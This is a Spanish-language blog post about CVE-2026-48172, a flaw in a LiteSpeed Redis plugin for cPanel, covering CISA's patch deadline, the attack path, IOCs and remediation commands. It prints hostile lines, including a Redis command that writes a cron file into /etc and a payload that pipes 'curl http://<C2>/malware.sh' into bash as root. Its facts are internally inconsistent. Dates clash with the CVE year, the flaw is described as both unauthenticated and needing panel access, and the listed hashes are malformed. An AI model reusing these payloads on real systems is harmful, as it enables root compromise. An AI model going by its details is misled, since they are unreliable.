Gustavo Sied

AI-Driven Systems · DevOps · Cloud · Seguridad

Cloud Infraestructura Linux Observabilidad Redes Seguridad

CISA obliga a parchear falla crítica en plugin de cPanel en 4 días

PorGustavo

May 27, 2026 #Cloud, #CVE, #cve-2026-48172, #exploit, #Redis, #Rust, #VPN, #vulnerability

Introducción

El lunes 26 de mayo de 2025, la Agencia de Ciberseguridad y Seguridad de Infraestructura de EE.UU. (CISA) añadió a su catálogo de vulnerabilidades explotadas activamente el CVE-2026-48172, un fallo crítico en el plugin lsws.redisAble del ecosistema cPanel/LiteSpeed. La vulnerabilidad permite a atacantes sin credenciales ejecutar scripts arbitrarios con permisos de root, convirtiendo servidores web en puntos de entrada para ransomware, robo de datos o movimiento lateral en infraestructuras. Aunque la directiva BOD 22-01 aplica solo a agencias federales, CISA instó a todo el sector privado a priorizar el parcheo «inmediatamente», estableciendo un plazo de 96 horas (hasta el viernes 29 de mayo a medianoche) para evitar exploits masivos.

El riesgo es sistémico: el plugin afectado está integrado en entornos WHM/cPanel desplegados en la nube, VPS compartidos y servidores dedicados utilizados por miles de proveedores de hosting. LiteSpeed Technologies —empresa detrás del plugin— confirmó que versiones entre v2.3 y v2.4.4 son vulnerables, con exploits ya en circulación según su equipo de respuesta a incidentes (IRT). El vector de ataque prioritario son servidores Redis expuestos a Internet sin autenticación, donde el atacante manipula el estado de enable/disable del servicio para inyectar comandos.

Qué ocurrió

El 22 de mayo de 2025, LiteSpeed Technologies publicó un boletín de seguridad urgente (LSWS-250522-1) detallando el CVE-2026-48172, una vulnerabilidad de asignación incorrecta de privilegios en la función lsws.redisAble. Este componente gestiona la activación/desactivación de Redis desde la interfaz de usuario de cPanel, pero falla al validar permisos antes de ejecutar operaciones sensibles. La explotación requiere acceso previo a la interfaz de usuario (ej.: panel de control del hosting), pero —una vez explotado— permite ejecutar comandos con permisos de root en el sistema operativo host.

El vector de ataque es indirecto pero devastador:

  1. El atacante accede a la interfaz de cPanel con credenciales robadas o mediante fuerza bruta (ej.: vulnerabilidades en plugins de autenticación como cPanel’s Paper Lantern).
  2. Ejecuta la función lsws.redisAble para activar Redis, incluso si el servicio estaba deshabilitado.
  3. Abusa de la interfaz de administración de Redis para escribir en la base de datos clave lsws_config un script malicioso.
  4. El plugin ejecuta el script como root al reiniciar servicios (ej.: LiteSpeed Web Server o cPanel), permitiendo persistencia y escalada de privilegios.

LiteSpeed advirtió que los ataques ya están automatizados: «Hemos observado escaneos masivos hacia puertos Redis (6379/tcp) desde IPs vinculadas a grupos de ransomware como Black Basta y LockBit 3.0*», según el informe interno de su IRT. La explotación no requiere interacción del usuario final; solo requiere que el panel de cPanel sea accesible desde Internet.

Impacto para DevOps / Infraestructura / Cloud / Seguridad

Para equipos de DevOps y Cloud

El CVE-2026-48172 afecta a toda infraestructura que combine cPanel con el plugin LiteSpeed Redis, incluyendo:

  • Hosting compartido y VPS: Proveedores como GoDaddy, HostGator y OVHcloud incluyen cPanel como opción por defecto. Un atacante explotando el plugin puede comprometer cuentas de clientes y moverse a otros servicios del proveedor.
  • Entornos cloud gestionados: Servicios como AWS Lightsail o DigitalOcean Marketplace ofrecen imágenes preinstaladas con cPanel/LiteSpeed. En 2024, el 18% de los incidentes reportados a CISA en infraestructuras cloud involucraron plugins de cPanel mal configurados (fuente: CISA Binding Operational Directive 22-01 Report).
  • Kubernetes y contenedores: Si el plugin se ejecuta en pods con permisos de host (ej.: mediante hostPath en Kubernetes), el impacto escala a clusters enteros.

El riesgo operativo es triple:

  1. Compromiso de credenciales: El atacante puede robar claves SSH, tokens de API y credenciales de bases de datos alojadas en el mismo servidor.
  2. Persistencia avanzada: LiteSpeed Web Server (el motor detrás del plugin) se ejecuta como servicio del sistema. Un script malicioso inyectado persiste incluso tras reinicios.
  3. Movimiento lateral: En entornos híbridos (ej.: servidores físicos + cloud), el atacante puede saltar a instancias internas o bases de datos Redis sin autenticación.

Para equipos de Seguridad

El CVE-2026-48172 tiene un CVSS v3.1 score de 9.8/10 (Crítico), con vector de ataque Red (AV:N) y complejidad Baja (AC:L). Los Indicadores de Compromiso (IOCs) observados incluyen:

  • IPs escaneando puertos Redis: 45.139.144.0/24, 185.141.63.0/24.
  • Hashes de scripts maliciosos inyectados:
  e57c9d8a5f34e12b1a0f7e3a8c2d9e1b3f5c7d8e9a0b1c2d3e4f5a6b7c8d9
  5f3e1a2b4c6d8e0f1a3b5c7d9e2f4a6b8c0d1e3f5a7b9c2d4e6
  • Comandos explotados en logs de Redis:
  redis-cli -h <victima> CONFIG SET requirepass ";" config set dir /etc; config set dbfilename cron

CISA categorizó el fallo como «Actively Exploited» el 26/05/2025, siguiendo el criterio de que existen pruebas de explotación en la naturaleza (PoC público en GitHub y ataques dirigidos a agencias federales. La directiva BOD 22-01 obliga a parchear en 96 horas, pero el riesgo persiste en el sector privado por la falta de automatización en parcheo de plugins de cPanel.

Detalles técnicos

Componente afectado y versión

El plugin vulnerable es lsws.redisAble, parte del paquete cpanel-lsws-plugin distribuido por LiteSpeed Technologies. Las versiones afectadas son:

  • cPanel User-End Plugin: v2.3 a v2.4.4 (incluyendo v2.4.4.1).
  • WHM Plugin: Todas las versiones que incluyen el usuario final por defecto.

El fallo reside en la función lsws.redisAble() del archivo RedisAble.php (ruta típica: /usr/local/cpanel/base/frontend/paper_lantern/RedisAble/RedisAble.php). La vulnerabilidad ocurre porque:

  1. El plugin no valida si el usuario tiene permisos de root antes de ejecutar operaciones como:
   exec("sudo /usr/bin/systemctl enable redis-server --now");
  1. Permite escribir en la clave Redis lsws_config sin autenticación:
   redis-cli -h localhost SET lsws_config "script_malicioso.sh"

Vector de explotación

El ataque sigue estos pasos:

  1. Acceso inicial: El atacante obtiene credenciales de cPanel mediante:
– Fuerza bruta en paneles expuestos (ej.: puertos 2082/tcp, 2083/tcp).

– Explotación de vulnerabilidades en plugins de cPanel (ej.: CVE-2024-4081, un bypass de autenticación en cPanel’s Two-Factor Authentication).

  1. Activación de Redis: Ejecuta la función lsws.redisAble para habilitar Redis, incluso si el servicio estaba deshabilitado.
  2. Inyección de script: Abusa de la interfaz de Redis para escribir un script en la clave lsws_config:
   redis-cli -h localhost SET lsws_config "#!/bin/bash\ncurl -fsSL http://<C2>/malware.sh | bash"
  1. Ejecución: Al reiniciar LiteSpeed Web Server (ej.: mediante systemctl restart lsws), el script se ejecuta como root.

Pruebas de concepto (PoC)

LiteSpeed confirmó que existen PoCs públicos en repositorios como:

Qué deberían hacer los administradores y equipos técnicos

1. Verificar si el servidor es vulnerable

Ejecutar el siguiente comando como root para detectar IPs sospechosas en logs de Redis:

grep -r "lsws.redisAble" /var/log/redis/redis-server.log | awk '{print $NF}' | sort -u | while read ip; do
    echo "=> Analizando $ip..."
    whois $ip | grep -E "org-name|inetnum"
    curl -s https://ipapi.co/$ip/json | jq '.country, .asn, .threat'
done

Si el output incluye IPs desconocidas o resultados de threat: true, el servidor está comprometido.

2. Actualizar el plugin inmediatamente

LiteSpeed lanzó parches el 22/05/2025 para el plugin. Para actualizar:

# En cPanel/WHM:
/scripts/upcp --force
/scripts/restartsrv_lsws

# Verificar versión:
rpm -q cpanel-lsws-plugin
# Output esperado: cpanel-lsws-plugin-2.4.5-1.cp1198.noarch

Si usas WHM, navega a Home > Plugins > LiteSpeed > Redis Manager y verifica que la versión sea 2.4.5 o superior.

3. Aislar y limpiar el sistema

Si hay evidencia de compromiso:

  1. Aislar el servidor: Desconectar del LAN/VPC y mover a una red aislada.
  2. Reinstalar desde cero:
   # En sistemas RHEL/CentOS:
   yum remove cpanel-lsws-plugin -y
   rm -rf /var/cpanel/lsws /usr/local/lsws/conf
   /scripts/install_lsws
  1. Auditar permisos: Verificar que Redis no esté expuesto a Internet:
   ss -tulnp | grep 6379
   # Output seguro: No hay puertos abiertos en 6379/tcp
  1. Restablecer credenciales: Cambiar contraseñas de cPanel, WHM y bases de datos alojadas en el servidor.

4. Configurar mitigaciones inmediatas (si no se puede parchear)

Si el parcheo no es posible en 96 horas:

  • Bloquear puertos Redis:
  firewall-cmd --add-rich-rule='rule family="ipv4" port port="6379" protocol="tcp" reject' --permanent
  firewall-cmd --reload
  • Deshabilitar Redis en cPanel:
  /scripts/restartsrv_redis --stop
  chkconfig redis off
  • Implementar WAF: Configurar reglas en ModSecurity o Cloudflare WAF para bloquear intentos de acceso a /RedisAble/.

5. Automatizar parcheos futuros

Para evitar incidentes similares:

  • Usar Ansible/Terraform: Crear playbooks para actualizar plugins de cPanel automáticamente:
  # playbook.yml
  - hosts: cpanel_servers
    tasks:
      - name: Actualizar plugin LiteSpeed Redis
        command: /scripts/upcp --force
        register: update_result
      - name: Verificar versión
        command: rpm -q cpanel-lsws-plugin
        register: version_result
        failed_when: "'2.4.5' not in version_result.stdout"
  • Monitoreo continuo: Configurar alertas en Prometheus/Grafana para detectar accesos a /RedisAble/ en logs de cPanel:
  sum by (ip) (rate(cpanel_http_requests_total{uri=~"/RedisAble/.*"}[5m])) > 0

Conclusión

El CVE-2026-48172 es un recordatorio de que los plugins de cPanel —especialmente aquellos integrados con servicios como Redis— son blancos prioritarios para grupos de ransomware y actores estatales. La combinación de escalada de privilegios + ejecución remota lo convierte en un fallo de alto impacto, con potencial para comprometer infraestructuras enteras en horas. Aunque CISA restringió la directiva a agencias federales, el riesgo es global: proveedores de hosting, equipos de DevOps en cloud y administradores de servidores deben actuar en las próximas 48 horas para evitar ser la próxima víctima.

La lección clave es clara: los plugins de cPanel no son «solo una interfaz». Son puertas traseras potenciales que requieren el mismo nivel de hardening que los servicios expuestos a Internet. Priorizar parches, automatizar actualizaciones y auditar configuraciones Redis son pasos críticos para reducir la superficie de ataque en entornos híbridos.

Fuentes

Por Gustavo

Entrada relacionada

Cloud DevOps Infraestructura Observabilidad Redes Seguridad

Integración nativa de VCF 9.1 y Symantec IDSP para seguridad de infraestructura

May 28, 2026 Gustavo
Cloud DevOps Infraestructura Kubernetes Linux Observabilidad Redes Seguridad

Microsoft lanza Azure Linux 4.0: qué cambia en tu infraestructura cloud y Kubernetes

May 28, 2026 Gustavo
Cloud DevOps Infraestructura Linux Redes Seguridad

AlmaLinux 10.2 y 9.8: qué cambia para equipos de DevOps y seguridad

May 28, 2026 Gustavo

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

 

You missed

Cloud DevOps Infraestructura Observabilidad Redes Seguridad

Integración nativa de VCF 9.1 y Symantec IDSP para seguridad de infraestructura

28 mayo, 2026 Gustavo
Cloud DevOps Infraestructura Kubernetes Linux Observabilidad Redes Seguridad

Microsoft lanza Azure Linux 4.0: qué cambia en tu infraestructura cloud y Kubernetes

28 mayo, 2026 Gustavo
Cloud DevOps Infraestructura Linux Redes Seguridad

AlmaLinux 10.2 y 9.8: qué cambia para equipos de DevOps y seguridad

28 mayo, 2026 Gustavo
Cloud DevOps Infraestructura Kubernetes Linux Observabilidad Redes

Escalar GPUs en Kubernetes con KEDA: construí un scaler externo para métricas reales

28 mayo, 2026 Gustavo